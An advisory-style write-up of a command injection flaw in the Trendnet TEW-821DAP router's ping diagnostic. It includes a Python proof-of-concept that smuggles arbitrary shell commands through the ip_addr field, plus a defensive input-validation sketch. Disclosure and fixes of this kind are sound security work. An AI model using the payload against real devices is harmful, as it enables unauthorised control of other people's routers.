# Trendnet TEW-821DAP Command Injection Vulnerability During Firmware Update Process

## Vulnerability Overview

During the firmware update process, the `tools_diagnostic()` function contains a command injection vulnerability. The user first inputs an IP address, which is validated via regular expression and then transmitted through an AJAX POST request. The IP address is stored in variable `s` and used as a parameter for the `ping` command. However, an attacker can inject malicious commands through the IP address value.

## Impact Scope

- **Affected Product**: TEW-821DAP
- **Firmware Version**: v1.12B01

## Remediation

No specific remediation is provided on the page.

## POC Code

```python
import time

# Method of the PoC's client class; it relies on self.session, self.base_url
# and self._post_apply(), which are defined elsewhere in that class.
def vuln01_ping_cmd(self, cmd):
    print(f"[*] Vul #1: Ping command injection")
    print(f"[*] malicious: {cmd}")
    # actual command: moshup script -c "ping 127.0.0.1" -f /dev/null;{cmd};# -s 56 -c 1" -f /tmp/xxx
    payload = f"127.0.0.1 -f /dev/null;{cmd};#"
    params = {
        "method": "0",
        "ip_addr": payload,
        "pkt_size": "56",
        "cnt": "1",
    }
    resp = self._post_apply("tools_diagnostic", params)
    print(f"[*] HTTP response code: {resp.status_code}")
    # Give the device time to run the diagnostic before fetching its output
    time.sleep(3)
    try:
        result_resp = self.session.get(f"{self.base_url}/diagnostic.xml")
        if result_resp.status_code == 200:
            print(f"[*] result:")
            print(result_resp.text)
    except Exception:
        pass
    return resp
```
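
The injection works because the `ip_addr` string reaches a shell command line unchanged. The sketch below is an added example, not code from the page or from the vendor: it shows server-side handling of the same three form fields (`ip_addr`, `pkt_size`, `cnt`) that parses the address instead of pattern-matching it and builds an argv list that needs no shell. The function names and the numeric bounds are assumptions.

```python
import ipaddress

# Assumed bounds; the page does not state the firmware's limits.
PKT_SIZE_RANGE = (1, 1472)
COUNT_RANGE = (1, 10)


class InvalidDiagnosticInput(ValueError):
    """Raised when a tools_diagnostic parameter fails server-side validation."""


def _bounded_int(name, raw, lo, hi):
    # ASCII-only isdigit() rejects signs, whitespace, separators and Unicode digits.
    if not (isinstance(raw, str) and raw.isascii() and raw.isdigit()):
        raise InvalidDiagnosticInput(f"{name} is not a plain decimal integer")
    value = int(raw)
    if not lo <= value <= hi:
        raise InvalidDiagnosticInput(f"{name} out of range {lo}-{hi}")
    return value


def build_ping_argv(params):
    """Return an argv list for ping built from the POSTed form fields.

    The canonical text of the parsed address object is what reaches the
    command, never the raw request string.
    """
    raw_ip = params.get("ip_addr", "")
    if not isinstance(raw_ip, str):
        raise InvalidDiagnosticInput("ip_addr must be a string")
    try:
        addr = ipaddress.IPv4Address(raw_ip)
    except ipaddress.AddressValueError as exc:
        raise InvalidDiagnosticInput("ip_addr is not an IPv4 address") from exc
    size = _bounded_int("pkt_size", params.get("pkt_size", ""), *PKT_SIZE_RANGE)
    count = _bounded_int("cnt", params.get("cnt", ""), *COUNT_RANGE)
    # An argv list is executed without a shell (e.g. subprocess.run(argv)),
    # so ';', '#' and spaces carry no special meaning.
    return ["ping", "-c", str(count), "-s", str(size), str(addr)]


def is_rejected(params):
    """True when the request would be refused before any command is built."""
    try:
        build_ping_argv(params)
    except InvalidDiagnosticInput:
        return True
    return False
```

A request shaped like the PoC's payload fails at the address parse, so no command is ever assembled from it.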